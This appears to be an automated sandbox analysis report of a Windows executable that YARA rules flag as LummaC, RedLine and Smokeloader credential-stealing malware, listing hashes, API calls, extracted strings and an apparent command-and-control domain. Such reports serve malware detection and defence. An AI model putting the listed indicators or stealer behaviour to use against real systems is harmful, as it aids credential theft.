2024-12-28 08:48:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:48:28
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\H1iOI9vWfh.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\H1iOI9vWfh.exe"
Imagebase:	0x400000
File size:	375'808 bytes
MD5 hash:	482BEB4E122303712335DAED6DF6A4DD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2615507633.0000000000BCA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2431557756.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:48:48
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1884
Imagebase:	0x20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	20.6%
Signature Coverage:	63.2%
Total number of Nodes:	136
Total number of Limit Nodes:	11

Executed Functions

Function 004361E0 Relevance: 33.9, APIs: 11, Strings: 8, Instructions: 636
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
SysAllocString.OLEAUT32(w!s#), ref: 004364FB
SysAllocString.OLEAUT32(A3q5), ref: 004365A1
VariantInit.OLEAUT32(?), ref: 00436613
VariantClear.OLEAUT32(?), ref: 00436775
SysFreeString.OLEAUT32(?), ref: 004367A0
SysFreeString.OLEAUT32(?), ref: 004367A6
SysFreeString.OLEAUT32(00000000), ref: 004367B3
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004367E7

Strings

BC, xrefs: 00436565
C, xrefs: 00436369
X&c8, xrefs: 0043628F
A;, xrefs: 0043643C
z7}9A3q5, xrefs: 004365BB
w!s#, xrefs: 004364F6, 004364FA
T'g), xrefs: 0043652D
Y/9Q, xrefs: 0043653D

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
API String ID: 2573436264-4124187736
Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A

Function 00415298 Relevance: 9.9, APIs: 1, Strings: 4, Instructions: 1123COMMON

Download Yara Rule

Strings

ydij, xrefs: 00415B93
Z\, xrefs: 00415344
kmbj, xrefs: 00415B8C
in~x, xrefs: 00415AFB

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: in~x$kmbj$ydij$Z\
API String ID: 0-979945983
Opcode ID: 26ca6100dcfc97b8c0c6fbf8c4ee366fc87c8afe50c98e0e46493e49499a4975
Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
Opcode Fuzzy Hash: 26ca6100dcfc97b8c0c6fbf8c4ee366fc87c8afe50c98e0e46493e49499a4975
Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55

Function 004210E0 Relevance: 8.0, Strings: 6, Instructions: 536
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h, xrefs: 004212F2
!@, xrefs: 00421116
,, xrefs: 0042161E
T, xrefs: 004216BE
U, xrefs: 004216C3
V, xrefs: 004216B9

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: !@$,$T$U$V$h
API String ID: 0-1072848446
Opcode ID: 1b37148a9dca08e68feec6fc32ee7d5c05668dd5b0338c2dc7096b623dae1273
Instruction ID: 7f4f8c271271a0ee30063bf5d57d9afa0b4a7bb7edff0777766b2e5d54dfe869
Opcode Fuzzy Hash: 1b37148a9dca08e68feec6fc32ee7d5c05668dd5b0338c2dc7096b623dae1273
Instruction Fuzzy Hash: CF22E17160C3A08FD320DF28D44436FBBE1ABD6314F598A2EE5D9873A1D77988458B4B

Function 0040CFF3 Relevance: 7.8, Strings: 6, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ZG, xrefs: 0040D25A
BI, xrefs: 0040D253
5A840351CDC61B5EF9F1B7136A1E0C5E, xrefs: 0040D049
pr, xrefs: 0040D2F1
lev-tolstoi.com, xrefs: 0040D34A
3ej, xrefs: 0040D2DD

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: 5A840351CDC61B5EF9F1B7136A1E0C5E$BI$ZG$lev-tolstoi.com$3ej$pr
API String ID: 0-1018603582
Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54

Function 00408790 Relevance: 7.6, APIs: 5, Instructions: 146
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004087B4
GetCurrentThreadId.KERNEL32 ref: 004087BE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
GetForegroundWindow.USER32 ref: 00408870

Part of subcall function 0040B9D0: FreeLibrary.KERNEL32(0040896B), ref: 0040B9D6
Part of subcall function 0040B9D0: FreeLibrary.KERNEL32 ref: 0040B9F7

ExitProcess.KERNEL32 ref: 00408972

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 3676751680-0
Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

Function 00BCB5D6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00BCB5FE
Module32First.KERNEL32(00000000,00000224), ref: 00BCB61E

Memory Dump Source

Source File: 00000000.00000002.2615507633.0000000000BCA000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BCA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 71934a84f7663b15c2d6350abab1218a923377b876a4ea69caa2800df54d0390
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 43F06D366007156BE7203AB9A88EF6EB7E8EF59725F1005ACE646D50C0DB70EC458A61

Function 0043CB20 Relevance: 2.6, Strings: 2, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0043CBF5
ihgf, xrefs: 0043CC13

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @$ihgf
API String ID: 2994545307-73152791
Opcode ID: 2e85ccf3c634bb8eb18bb8f5a370902e051506c7f06aba8c0c1ef036a9d8f182
Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
Opcode Fuzzy Hash: 2e85ccf3c634bb8eb18bb8f5a370902e051506c7f06aba8c0c1ef036a9d8f182
Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A

Function 0040B44C Relevance: 1.6, Strings: 1, Instructions: 345COMMON

Download Yara Rule

Strings

h d", xrefs: 0040B73E

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: h d"
API String ID: 0-862628183
Opcode ID: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
Instruction ID: e7b26040d347b48bd15f509a2e92d141a5522c4f34e33ed28b849909e17f734e
Opcode Fuzzy Hash: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
Instruction Fuzzy Hash: 81B1CF79204700CFD3248F74EC91B67B7F6FB4A301F058A7DE99682AA0D774A859CB18

Function 0043A9B0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043CD60 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043CD85

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: aa3d1f857265f2d1eec240e1ce09a33a68e210528346f5167762aa40738f4e39
Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
Opcode Fuzzy Hash: aa3d1f857265f2d1eec240e1ce09a33a68e210528346f5167762aa40738f4e39
Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A

Function 0043B05B Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d951b1bf8575b638b514a071f1e27b8906d3225ac76758bc526cbf2df91afa5
Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
Opcode Fuzzy Hash: 7d951b1bf8575b638b514a071f1e27b8906d3225ac76758bc526cbf2df91afa5
Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD

Function 009B003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 009B024D

Strings

cess, xrefs: 009B018D
kernel32.dll, xrefs: 009B008F, 009B0095

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 9e9f84a109257b54853148e16428cd8b539b9773b1213dbfa97cba74c9b7c1b4
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 43527874A00229DFDB64CF68C984BADBBB1BF49314F1480D9E94DAB251DB30AE84DF14

Function 0043AB0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043AB9F

Strings

ilmn, xrefs: 0043AB7D

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID: ilmn
API String ID: 2020703349-1560153188
Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

Function 0040EA11 Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040EA15
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040EB5C

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
Instruction ID: 6a516bc968bc721a6a6447d4bb28a67b77a0153a8c52e65a7a5ccdf46234fc14
Opcode Fuzzy Hash: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
Instruction Fuzzy Hash: 7B41E8B4D10B40AFD370EF39DA4B7127EB4AB05250F504B2EF9E6866D4E231A4198BD7

Function 009B0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,009B0223,?,?), ref: 009B0E19
SetErrorMode.KERNELBASE(00000000,?,?,009B0223,?,?), ref: 009B0E1E

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 834e71a4ee2bb256775d8f514e505c58297908d8ee81c6856434322e2576a7f4
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 31D01232245228B7DB002AD4DC09BCEBB1CDF09BA2F008421FB0DE9080CBB09A4046EA

Function 0043A950 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F

Function 0043AB91 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043AB9F

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49

Function 0040E648 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E65A

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
Instruction ID: 1ef2cd84d3f3a248c300a9315f5ba7c079722d57ce9cb5108686e78c00d3b34e
Opcode Fuzzy Hash: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
Instruction Fuzzy Hash: 03D0C9343C434076F2654718EC57F1432119302F11F701224B323FE2E1C9D07141860C

Function 00438E70 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8

Function 00438E47 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E

Function 00438E51 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E

Function 00BCB295 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00BCB2E6

Memory Dump Source

Source File: 00000000.00000002.2615507633.0000000000BCA000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BCA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: c82a62bd66f1a59ba00a572537632b5f6c40797df1d9c32075bcf28fe173224d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: C5112B79A00208EFDB01DF98C985E98BBF5AF08351F158094F9489B362D371EA50DF84

Non-executed Functions

Function 0043462A Relevance: 127.9, Strings: 102, Instructions: 417COMMON

Download Yara Rule

Strings

$, xrefs: 00434763
), xrefs: 004347CC
`, xrefs: 00434907
M, xrefs: 00434636
e, xrefs: 00434AEE
t, xrefs: 00434993
8, xrefs: 0043477F
N, xrefs: 00434740
e, xrefs: 004346DE
e, xrefs: 004346B4
D, xrefs: 00434843
~, xrefs: 0043466E
=, xrefs: 00434812
N, xrefs: 00434819
&, xrefs: 00434771
e, xrefs: 00434708
Z, xrefs: 00434794
l, xrefs: 004348EB
c, xrefs: 00434AE6
?, xrefs: 004346D0
^, xrefs: 0043475C
x, xrefs: 004346A6
f, xrefs: 00434931
t, xrefs: 004347E8
t, xrefs: 00434644
;, xrefs: 00434820
}, xrefs: 00434882
>, xrefs: 004347A9
(, xrefs: 0043470F
?, xrefs: 00434874
4, xrefs: 00434BD3
a, xrefs: 0043482E
n, xrefs: 004348F9
:, xrefs: 0043478D
p, xrefs: 00434977
H, xrefs: 004347EF
k, xrefs: 00434B06
*, xrefs: 0043471D
., xrefs: 0043489E
j, xrefs: 004348DD
v, xrefs: 0043467C
2, xrefs: 004347C5
r, xrefs: 00434985
z, xrefs: 0043494D
L, xrefs: 0043480B
s, xrefs: 004348AC
V, xrefs: 004348C1
!, xrefs: 0043483C
-, xrefs: 00434652
F, xrefs: 00434851
D, xrefs: 0043476A
T, xrefs: 004348B3
%, xrefs: 0043468A
+, xrefs: 00434890
,, xrefs: 0043472B
], xrefs: 00434962
0, xrefs: 0043484A
5, xrefs: 004346FA
., xrefs: 004348C8
i, xrefs: 004346C2
~, xrefs: 00434969
~, xrefs: 004347BE
X, xrefs: 0043485F
g, xrefs: 00434AF6
O, xrefs: 004347A2
U, xrefs: 00434724
., xrefs: 00434739
%, xrefs: 00434866
R, xrefs: 004348A5
i, xrefs: 00434AFE
C, xrefs: 0043491C
>, xrefs: 00434858
[, xrefs: 00434778
\, xrefs: 00434716
", xrefs: 00434755
Z, xrefs: 0043486D
4, xrefs: 004347D3
^, xrefs: 00434889
|, xrefs: 0043495B
v, xrefs: 004349A1
, xrefs: 00434747
Z, xrefs: 004347B0
1, xrefs: 004348BA
d, xrefs: 00434923
J, xrefs: 004347FD
p, xrefs: 00434698
